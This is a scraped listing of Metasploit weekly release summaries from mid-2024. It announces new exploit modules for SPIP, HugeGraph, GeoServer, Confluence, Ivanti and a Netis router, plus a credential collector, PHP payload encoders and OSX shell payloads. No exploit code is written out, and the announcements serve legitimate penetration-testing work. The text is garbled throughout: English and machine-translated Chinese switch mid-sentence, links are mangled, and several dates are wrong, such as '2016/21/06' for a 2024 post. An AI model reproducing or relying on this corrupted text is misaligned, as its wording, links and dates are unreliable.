2 min
Metasploit
Metasploit每周总结2024年9月13日
SPIP Modules
This week brings more modules targeting the SPIP publishing platform. SPIP has
gained some attention from Metasploit community contributors recently and has
inspired some PHP payload and encoder improvements.
新增模块内容(2)
SPIP BigUp插件未经认证的RCE
Authors: Julien Voisin, Laluka, Valentin Lobstein, and Vozec
Type: Exploit
拉取请求:#19444 [http://github ..com/rapid7/metasploit-framework/pull/19444]
Chocapikk [http://github]贡献.com/Chocapikk]
Pat
2 min
Metasploit
Metasploit周报——2024年6月9日
亲爱的,我缩减了PHP的有效负载
This release contains more PHP payload improvements from Julien Voisin. Last
week we landed a PR from Julien that added a datastore option to the php/base64
encoder that when enabled, will use zlib to compress the payload which
significantly reduced the size, bringing a payload of 4040 bytes down to a mere
1617 bytes. This week's release includes a php/minify encoder which removes all
unnecessary characters from the payload including comments, empty lines, leadin
4 min
Metasploit
Metasploit周报08/30/2024
一种编码PHP有效负载的新方法
A new PHP encoder has been released by a community contributor, jvoisin
[http://github.com/jvoisin], allowing a PHP payload to be encoded as an
ASCII-Hex字符串. This can then be decoded on the receiver to prevent issues
带有未转义字符或坏字符的.
射线的漏洞
This release of Metasploit Framework also features 3 new modules to target
ray.io, which is a framework for distributing AI-related workloads across
多台机器,这使它成为一个多余的
1 min
Metasploit
Metasploit周报08/23/2024
新增模块内容(3)
Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)
作者:Michael Heinzl和Tenable
Type: Auxiliary
拉取请求:#19373 [http://github ..com/rapid7/metasploit-framework/pull/19373]
由h4x-x0r [http://github]贡献.com/h4x-x0r]
Path: admin/http/fortra_filecatalyst_workflow_sqli
攻击者kb参考:CVE-2024-5276
[http://attackerkb.com/search?q=CVE-2024-5276&referrer=blog]
Description: This adds an auxiliary module to exploit the CVE-2024-5276, a SQL
inj
2 min
Metasploit
Metasploit周报08/16/2024
新增模块内容(3)
Apache HugeGraph Gremlin RCE
作者:6right和jheyself -r7
Type: Exploit
拉取请求:#19348 [http://github ..com/rapid7/metasploit-framework/pull/19348]
由jheysel-r7 [http://github]贡献.com/jheysel-r7]
Path: linux/http/apache_hugegraph_gremlin_rce
攻击者kb参考:CVE-2024-27348
[http://attackerkb.com/search?q=CVE-2024-27348&referrer=blog]
Description: Adds an Apache HugeGraph Server exploit for GHSA-29rc-vq7f-x335
[http://github.com/advisories/GHSA-29r
1 min
Metasploit
Metasploit周报08/09/2024
Black Hat & DEF CON
Hopefully folks were able to catch our Rapid7 researchers @zeroSteiner
[http://x.com/zeroSteiner] & 杰克·海塞尔展示了Metasploit.4's
features, focusing on combinations that allow for new, streamlined attack
黑帽的工作流程. If not they will also be demoing at DEF CON tomorrow in
room W304!
新增模块内容(1)
Calibre Python Code Injection (CVE-2024-6782)
作者:Amos Ng和Michael Heinzl
Type: Exploit
拉取请求:#19357 [http://github ..com/rapid7/meta
2 min
Metasploit
Metasploit周报08/02/2024
Metasploit去了黑客夏令营
Next week, Metasploit will have demos at both Black Hat
[http://www.blackhat.com/us-24/arsenal/schedule/index.html # - metasploit框架- 39570]
和DEF CON [http://defcon].org/html/defcon-32/dc-32-demolabs.html # 54186)
the latest functionality from this year will be presented. 黑帽演示
will be on Thursday the 8th from 10:10 to 11:25 and the DEF CON demo will be on
周六,10号,12:00 - 13:45.
亮点将包括表演
2 min
Metasploit
Metasploit周报07/26/2024
新增模块内容(3)
Magento XXE反序列化任意文件读取
作者:Heyder和Sergey Temnikov
Type: Auxiliary
拉取请求:#19304 [http://github ..com/rapid7/metasploit-framework/pull/19304]
heyder [http://github]贡献.com/heyder]
路径:收集/ magento_xxe_cve_2024_34102
攻击者kb参考:CVE-2024-34102
[http://attackerkb.com/search?q=CVE-2024-34102&referrer=blog]
Description: This adds an auxiliary module for an XXE which results in an
任意文件在Magento是
2 min
Metasploit每周总结
Metasploit每周总结7/19/2024
A new unauthenticated RCE exploit for GeoServer, plus library and Meterpreter updates and enhancements.
2 min
Metasploit
Metasploit每周总结07/12/2024
常见的嫌疑犯
This release features two new exploits targeting old friends: Confluence and
Ivanti. CVE-2024-21683
[http://attackerkb.com/search?q=CVE-2024-21683&推荐人=博客]是很容易的
vulnerability to exploit, but as pointed out in the AttackerKB Review
[http://attackerkb.com/assessments/5ad314a1-9fd7-47d7-835f-f29680b3961d?referrer=blog]
, it requires authentication as a ‘Confluence Administrator.“另一方面,
CVE-2024-29824 is an unauthenticated SQL Injection in Ivanti End
2 min
Metasploit
Metasploit周报07/05/2024
3 new modules - MOVEit Transfer authentication bypass CVE-2024-5806, Zyxel指令注入, 和Azure CLI凭证收集器
2 min
Metasploit
Metasploit周报06/28/2024
Unauthenticated Command Injection in Netis Router
This week's Metasploit release includes an exploit module for an unauthenticated
command injection vulnerability in the Netis MW5360 router which is being
被追踪为CVE-2024-22729. The vulnerability stems from improper handling of the
password parameter within the router's web interface which allows for command
injection. Fortunately for attackers, the router's login page authorization can
be bypassed by simply deleting the authorization header,
3 min
Metasploit
Metasploit周报2016/21/06
Windows上PHP的参数注入
This week includes modules that target file traversal and arbitrary file read
vulnerabilities for software such as Apache, SolarWinds and Check Point, with
the highlight being a module for the recent PHP vulnerability submitted by
sfewer-r7 [http://github.com/sfewer-r7]. 这个模块利用一个参数
injection vulnerability, resulting in remote code execution and a Meterpreter
shell running in the context of the Administrator user.
注意,这个攻击
3 min
Metasploit
Metasploit每周总结2024年6月14日
新增模块内容(5)
teleerik报表服务器验证旁路
作者:SinSinology和Spencer McIntyre
Type: Auxiliary
拉取请求:#19242 [http://github ..com/rapid7/metasploit-framework/pull/19242]
由zeroSteiner [http://github]贡献.com/zeroSteiner]
Path: scanner/http/telerik_report_server_auth_bypass
攻击者kb参考:CVE-2024-4358
[http://attackerkb.com/search?q=CVE-2024-4358?referrer=blog]
Description: This adds an exploit for CVE-2024-4358 which is an authentication
bypass in Te
2 min
Metasploit
Metasploit周报2016/07/06
新的OSX有效载荷:武装和危险
In addition to an RCE leveraging CVE-2024-5084 to gain RCE through a WordPress
Hash form, this release features the addition of several new binary OSX
stageless payloads with aarch64 support: Execute Command, Shell Bind TCP, and
反向TCP.
The new osx/aarch64/shell_bind_tcp payload opens a listening port on the target
machine, which allows the attacker to connect to this open port to spawn a
command shell using the user provided command using the exe